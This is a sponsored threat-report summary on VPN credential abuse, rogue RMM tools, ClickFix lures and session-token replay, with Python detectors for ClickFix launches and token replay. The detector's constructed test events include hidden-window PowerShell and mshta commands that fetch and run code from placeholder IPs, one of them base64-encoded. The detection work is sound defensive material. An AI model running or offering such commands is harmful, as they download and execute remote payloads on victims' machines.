Wednesday, April 1, 2026

Routine Access Is Powering Modern Intrusions, a New Threat Report Finds



Remote access and trusted administrative tools play a central role in how organizations operate today. According to Blackpoint Cyber's 2026 Annual Threat Report, they are also increasingly central to how intrusions begin.

Informed by analysis of thousands of security investigations conducted during the reporting period, the report highlights a shift in attacker behavior. Rather than relying primarily on vulnerability exploitation, threat actors frequently gained access by using valid credentials, legitimate tools, and routine user-driven actions.

The report examines these patterns, documents where intrusion activity was disrupted, and presents defensive priorities derived from the incident response outcomes analyzed throughout 2025.

Additional data and incident walkthroughs will be covered during an upcoming live webinar hosted by Blackpoint Cyber.

➡️ Register here

Key Findings From the 2026 Annual Threat Report

Attackers Are Entering Through Legitimate Access Paths

Across the incidents analyzed in the report, attackers were more likely to log in using legitimate access than to exploit vulnerabilities as their primary entry point.

SSL VPN abuse accounted for 32.8 percent of all identifiable incidents, making it one of the most common initial access vectors. In many cases, threat actors authenticated using valid but compromised credentials, resulting in VPN sessions that appeared legitimate to security controls.

Once access was established, these sessions often provided broad internal reach, allowing attackers to move quickly toward high-value systems without immediately triggering alerts.

Trusted IT Tools Are Being Used Against Organizations

The report also documents frequent abuse of legitimate Remote Monitoring and Management (RMM) tools as a means of access and persistence.

RMM abuse appeared in 30.3 percent of identifiable incidents, with ScreenConnect present in more than 70 percent of rogue RMM cases. Because these tools are commonly used for standard IT administration, unauthorized installations often resembled expected activity and were difficult to distinguish without strong visibility.

The report notes that environments with multiple remote access tools in use were more likely to see rogue instances blend in with existing tooling.

Social Engineering, Not Exploits, Drove the Majority of Incidents

While legitimate access paths enabled many intrusions, user interaction represented the largest driver of overall incident volume.

Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identifiable incidents, making them the most common attack pattern documented in the report.

Rather than exploiting software vulnerabilities, these campaigns relied on deceptive prompts. Users were instructed to paste commands into the Windows Run dialog as part of what appeared to be a routine verification step. Execution used built-in Windows tools, without traditional malware downloads or exploit activity.
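The execution chain described above leaves a recognizable footprint in process-creation telemetry: anything launched from the Win+R Run dialog is spawned by explorer.exe, and the pasted command almost always invokes a built-in script host or download utility with a command line that fetches or decodes remote content. The following detector is an added example written for this page, not code from the report or from Blackpoint Cyber. The event records are constructed, Sysmon-like EventID 1 records with simplified field names, and the IP addresses are documentation-range placeholders.

```python
"""Heuristic detector for ClickFix-style execution: a Windows script host or
download utility whose parent is explorer.exe (the parent of anything started
via the Run dialog) and whose command line carries payload-delivery indicators.
SAMPLE_EVENTS below are CONSTRUCTED for this example, not real telemetry."""
import base64
import ntpath
import re

# Built-in Windows binaries that ClickFix lures typically invoke.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe", "curl.exe",
}

# Command-line indicators, each named so an analyst can see why a hit fired.
INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?\b"),
    # -e / -enc / -EncodedCommand followed by a long base64 blob
    "encoded_command": re.compile(r"(?i)-e[a-z]*\s+[A-Za-z0-9+/=]{40,}"),
    "remote_fetch": re.compile(r"(?i)\b(iex|invoke-expression|iwr|invoke-webrequest|"
                               r"downloadstring|curl|certutil|bitsadmin)\b"),
    "mshta_url": re.compile(r"(?i)\bmshta(\.exe)?\s+\"?https?://"),
    # Lure text that victims paste along with the command
    "captcha_lure": re.compile(r"(?i)(not a robot|captcha|verif(y|ication))"),
}

# Constructed base64 payload so the encoded-command sample is realistic.
_ENCODED = base64.b64encode(
    "IEX (IWR http://198.51.100.7/a)".encode("utf-16-le")).decode()

# Constructed Sysmon-like process-creation events (EventID 1).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://198.51.100.7/v.txt '
                    '-UseBasicParsing)" # I am not a robot - Verification ID: 4821'},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://203.0.113.9/verify.hta"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},  # user opened a shell: no indicators
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File "
                    r"C:\ProgramData\Patch\inventory.ps1"},  # not explorer-spawned
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad"},  # not a script host
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell -enc " + _ENCODED},
]


def classify_event(event):
    """Return the indicator names that fire for one process-creation event,
    or an empty list when the event does not fit the ClickFix pattern."""
    if event.get("EventID") != 1:
        return []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    if parent != "explorer.exe" or image not in SCRIPT_HOSTS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def detect_clickfix(events):
    """Return (event, indicators) pairs for events tripping at least one indicator."""
    hits = []
    for ev in events:
        fired = classify_event(ev)
        if fired:
            hits.append((ev, fired))
    return hits


if __name__ == "__main__":
    for ev, fired in detect_clickfix(SAMPLE_EVENTS):
        print(ntpath.basename(ev["Image"]), fired)
```

The parent check alone is not enough, because a user opening PowerShell from the Start menu also produces an explorer.exe parent; the command-line indicators are what separate a lure from routine use. On a suspect host, the Run dialog's history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU usually still holds the pasted command and is worth collecting during triage.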

Cloud Intrusions Focused on Session Reuse After MFA

Multi-factor authentication was enabled in many of the cloud environments associated with investigated incidents, yet account compromise still occurred.

Adversary-in-the-Middle phishing accounted for roughly 16 percent of the cloud account disables documented in the report. In these cases, MFA functioned as designed. Rather than bypassing authentication, attackers captured the authenticated session tokens issued after successful MFA and reused them to access cloud services.

From the perspective of the cloud platform, this activity aligned with a legitimate authenticated session.
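Because the replayed token is genuine, the platform's own authentication checks pass; what does stand out is that the MFA requirement is being satisfied by a token claim from a network on which MFA was never actually completed. The function below applies that heuristic to a batch of sign-in records. It is an added example for this page, not code from the report or from Blackpoint Cyber. The record layout (time, user, session_id, ip, country, mfa) is a constructed, simplified schema rather than any real identity provider's log format, and the IP addresses are documentation-range placeholders.

```python
"""Flag suspected session-token replay after an Adversary-in-the-Middle phish.
For each (user, session) the first sign-in where MFA was actually performed is
the anchor; later sign-ins in the same session whose MFA requirement was
satisfied only by a token claim, from a different IP or country than the
anchor, are flagged. Sessions that never show an MFA event at all (the token
was minted somewhere this log does not cover) are flagged separately.
SIGN_INS is CONSTRUCTED sample data with a simplified schema."""
from collections import defaultdict
from datetime import datetime

# mfa: "performed"   -> the provider challenged the user and MFA succeeded
#      "token_claim" -> MFA requirement satisfied by a claim carried in the token
SIGN_INS = [
    {"time": "2025-09-04T08:02:00Z", "user": "j.doe@example.com", "session_id": "s-7f3a",
     "ip": "203.0.113.24", "country": "US", "mfa": "performed"},
    {"time": "2025-09-04T08:05:30Z", "user": "j.doe@example.com", "session_id": "s-7f3a",
     "ip": "198.51.100.77", "country": "NL", "mfa": "token_claim"},   # replay
    {"time": "2025-09-04T08:40:00Z", "user": "j.doe@example.com", "session_id": "s-7f3a",
     "ip": "203.0.113.24", "country": "US", "mfa": "token_claim"},    # legitimate reuse
    {"time": "2025-09-04T09:10:00Z", "user": "a.roe@example.com", "session_id": "s-9c21",
     "ip": "192.0.2.15", "country": "US", "mfa": "performed"},
    {"time": "2025-09-04T09:30:00Z", "user": "a.roe@example.com", "session_id": "s-9c21",
     "ip": "192.0.2.15", "country": "US", "mfa": "token_claim"},     # same network
    {"time": "2025-09-04T10:00:00Z", "user": "m.lee@example.com", "session_id": "s-1b44",
     "ip": "198.51.100.77", "country": "NL", "mfa": "token_claim"},   # no MFA ever seen
]


def _ts(stamp):
    """Parse an ISO-8601 UTC timestamp ending in Z."""
    return datetime.fromisoformat(stamp.replace("Z", "+00:00"))


def find_token_replay(sign_ins, max_gap_minutes=720):
    """Return a list of findings, one dict per suspicious session condition."""
    sessions = defaultdict(list)
    for ev in sign_ins:
        sessions[(ev["user"], ev["session_id"])].append(ev)

    findings = []
    for (user, sid), evs in sessions.items():
        evs.sort(key=lambda e: _ts(e["time"]))
        anchor = next((e for e in evs if e["mfa"] == "performed"), None)
        if anchor is None:
            # Token is being honored but this log never saw MFA for the session.
            findings.append({"user": user, "session_id": sid,
                             "reason": "no_mfa_event_for_session",
                             "ips": sorted({e["ip"] for e in evs})})
            continue
        anchor_net = (anchor["ip"], anchor["country"])
        for ev in evs:
            if ev["mfa"] != "token_claim":
                continue
            gap = (_ts(ev["time"]) - _ts(anchor["time"])).total_seconds() / 60
            if 0 <= gap <= max_gap_minutes and (ev["ip"], ev["country"]) != anchor_net:
                findings.append({"user": user, "session_id": sid,
                                 "reason": "token_used_from_new_network",
                                 "anchor_ip": anchor["ip"], "replay_ip": ev["ip"],
                                 "minutes_after_mfa": round(gap, 1)})
    return findings


if __name__ == "__main__":
    for f in find_token_replay(SIGN_INS):
        print(f)
```

Two caveats matter in practice. Mobile users and split-tunnel VPNs legitimately change IP mid-session, so the network comparison is best done at ASN or country granularity rather than exact IP, with the window tuned to the token lifetime in use. And a finding is only the start: the response the page's fourth defensive priority points at is to revoke the user's sessions so the stolen token stops working, then re-evaluate Conditional Access so that device posture, not just a successful MFA claim, is required for the session to be issued at all.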

Many of the attacks described above begin with legitimate access. What happens next is where the real damage occurs.

In a recent investigation, our SOC identified a new implant known as Roadk1ll, designed to pivot across systems using WebSocket-based communication and maintain access while blending into network traffic.

Join Inside the SOC Episode #002 to see how these attacks progress from initial access to full environment compromise.

Save your seat

What These Findings Mean for Security Teams

Across industries, environments, and attack types, the report highlights a consistent pattern: many successful intrusions relied on activity that blended into normal operations.

Rather than relying on novel exploits or advanced malware, attackers abused everyday workflows such as remote logins, trusted tools, and common user actions. Based on the attack chains analyzed, the report identifies several defensive priorities:

  • Treat remote access as high-risk, high-impact activity
  • Maintain a complete inventory of approved RMM tools and remove unused or legacy agents
  • Restrict unapproved software installations and limit execution from user-writable directories
  • Apply Conditional Access controls that evaluate device posture, location, and session risk

These patterns were documented across frequently targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction.

For teams interested in examining how these intrusion patterns unfold, Blackpoint Cyber will review key findings, case examples, and defensive takeaways from the 2026 Annual Threat Report during an upcoming live webinar.

➡️ Register to receive the 2026 Annual Threat Report

Sponsored and written by Blackpoint Cyber.
